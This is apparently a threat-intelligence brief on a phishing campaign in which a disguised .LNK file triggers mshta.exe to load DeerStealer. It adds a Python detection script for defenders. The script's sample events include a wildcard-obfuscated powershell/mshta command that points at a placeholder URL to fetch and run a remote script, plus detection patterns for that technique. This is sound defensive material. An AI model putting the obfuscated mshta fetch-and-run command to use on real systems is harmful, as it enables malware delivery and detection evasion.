Date: 2025-07-22
Malware, Phishing

Trojanized .LNK files leveraged for DeerStealer malware delivery

Cyber Security News reports that weaponized .LNK files have been used to facilitate the distribution of the DeerStealer malware as part of a novel phishing campaign.

Attacks begin with the delivery of a 'Report.lnk' file that masquerades as a PDF and triggers mshta.exe to execute scripts that use wildcard paths to evade detection, according to an analysis from ANY.RUN researchers. Besides disabling logging and profiling functionality to stay stealthy, the script performs character-pair decoding to conceal its malicious logic before launching DeerStealer, which establishes persistence. "The script dynamically resolves URLs and binary content from obfuscated arrays, downloads a fake PDF file to distract the user, writes the payload into AppData and silently runs it," said ANY.RUN researchers, who noted that these findings, which show abuse of MITRE ATT&CK technique T1218.005 alongside advanced detection bypass tactics, indicate the sophistication of the intrusion.
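For defenders, the wildcard-path and mshta.exe behaviour described above can be hunted in process-creation telemetry. The following is an added example, not code from ANY.RUN or the original report; the event field names (`image`, `command_line`), the rule names and the sample events are assumptions constructed for illustration.

```python
import fnmatch
import re

# Folders where mshta.exe normally lives, as (folder, file), lower-case.
MSHTA_LOCATIONS = [("system32", "mshta.exe"), ("syswow64", "mshta.exe")]
PATH_TOKEN = re.compile(r"[A-Za-z]:\\[^\s\"'();,]+")
REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)

def resolves_to_mshta(command_line):
    """True if a wildcarded path in the command line could glob to mshta.exe."""
    for token in PATH_TOKEN.findall(command_line):
        if "*" not in token and "?" not in token:
            continue  # literal paths are covered by the image-name rule
        parts = token.lower().split("\\")
        if len(parts) < 3:
            continue
        folder, leaf = parts[-2], parts[-1]
        # Treat the last two path components as glob patterns and test
        # whether they can expand to a known mshta.exe location.
        if any(fnmatch.fnmatchcase(d, folder) and fnmatch.fnmatchcase(f, leaf)
               for d, f in MSHTA_LOCATIONS):
            return True
    return False

def classify(event):
    """Return the names of the rules that fire for one process-creation event."""
    findings = []
    image = event["image"].lower().rsplit("\\", 1)[-1]
    if image == "mshta.exe" and REMOTE_URL.search(event["command_line"]):
        findings.append("mshta-remote-script")      # T1218.005
    if resolves_to_mshta(event["command_line"]):
        findings.append("wildcard-path-to-mshta")
    return findings

def scan(events):
    """Map event index to fired rules, omitting clean events."""
    return {i: f for i, e in enumerate(events) if (f := classify(e))}

# Constructed sample events (not taken from the ANY.RUN analysis).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -c "C:\W*\S*2\m*h?a.* https://example.invalid/a"'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'"C:\Windows\System32\mshta.exe" https://example.invalid/a'},
    {"image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Tools\inventory.hta"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"cmd.exe /c dir C:\Users\*\Documents\*.pdf"},
]
```

Broad globs over the System32 folder itself (for example a directory listing of `*.exe`) will also match the wildcard rule, so pair it with parent-process or script-host context when tuning.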

